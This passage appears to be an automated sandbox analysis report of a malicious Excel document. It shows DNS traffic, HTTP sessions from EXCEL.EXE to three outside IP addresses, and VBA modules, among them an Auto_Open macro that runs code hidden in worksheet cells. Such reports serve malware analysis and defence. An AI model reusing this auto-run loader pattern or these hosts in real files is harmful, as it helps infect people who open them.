May 4, 2021 17:38:12.828279972 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:12.877003908 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:13.706718922 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:13.767060041 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:14.616766930 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:14.670813084 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:15.492141962 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:15.541824102 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:16.673034906 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:16.722683907 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:17.938657999 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:17.990377903 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:19.188354969 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:19.237061977 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:24.480259895 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:24.528985023 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:25.570234060 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:25.661541939 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:25.872539043 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:25.921317101 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:26.616837978 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:26.691057920 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:27.622247934 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:27.682998896 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:28.657855034 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:28.718725920 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:29.434676886 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:29.483266115 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:30.669523001 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:30.730911016 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:32.015526056 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:32.066981077 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:32.816648960 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:32.867364883 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:33.748645067 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:33.810759068 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:34.665618896 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:34.739639997 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:34.829763889 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:34.882055044 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:36.463641882 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:36.515870094 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:37.590553999 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:37.639255047 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:38.470926046 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:38.519608974 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:39.296072960 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:39.344980001 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:40.112826109 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:40.163044930 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:49.279464960 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:49.338754892 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:38:49.991504908 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:38:50.040185928 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:39:00.218113899 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:39:00.281357050 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:39:08.015546083 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:39:08.075789928 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:39:29.808487892 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:39:29.857932091 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:39:36.206809044 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:39:36.265146017 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:39:52.295336962 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:39:52.360425949 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:40:06.671833038 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:40:06.720465899 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
May 4, 2021 17:40:09.491715908 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
May 4, 2021 17:40:09.555052996 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
May 4, 2021 17:38:37.639370918 CEST | 192.168.2.3 | 8.8.8.8 | d077 | (Port unreachable) | Destination Unreachable |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49722 | 91.211.91.81 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2021 17:38:34.086118937 CEST | 1194 | OUT | |
May 4, 2021 17:38:34.233530998 CEST | 1199 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.3 | 49723 | 5.34.179.36 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2021 17:38:34.463059902 CEST | 1206 | OUT | |
May 4, 2021 17:38:35.012475967 CEST | 1210 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.3 | 49725 | 45.153.229.23 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2021 17:38:35.085726023 CEST | 1211 | OUT | |
May 4, 2021 17:38:35.210279942 CEST | 1216 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 17:38:24 |
Start date: | 04/05/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x60000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: Blasr |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Blasr" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Run | Microsoft Excel:Application.Run( |
Range | |
Run | |
Range | |
Run | |
Range |
Strings | Decrypted Strings |
---|---|
"AJ6" | |
"Nyukasl" | |
"A5" | |
"Nyukasl" | |
"A5" | |
"Nyukasl" |
Line | Instruction | Meta Information |
---|---|---|
2 | Private Sub Auto_Open() | |
3 | Application.Run Sheets("Nyukasl").Range("AJ6") | Microsoft Excel:Application.Run( Range executed |
5 | Application.Run Sheets("Nyukasl").Range("A5") | Run Range |
6 | Application.Run Sheets("Nyukasl").Range("A5") | Run Range |
13 | End Sub |
Module: Briks |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Briks" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
Module: Byutut |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Byutut" |
Module: Class1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Class1" |
2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = False |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |
Module: Class2 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Class2" |
2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = False |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |
Module: Class3 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Class3" |
2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = False |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |
Module: Kikide |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Kikide" |
2 | Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
Module: UserForm1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "UserForm1" |
2 | Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |
Module: Vrest |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Vrest" |
Module: Vsewd |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Vsewd" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |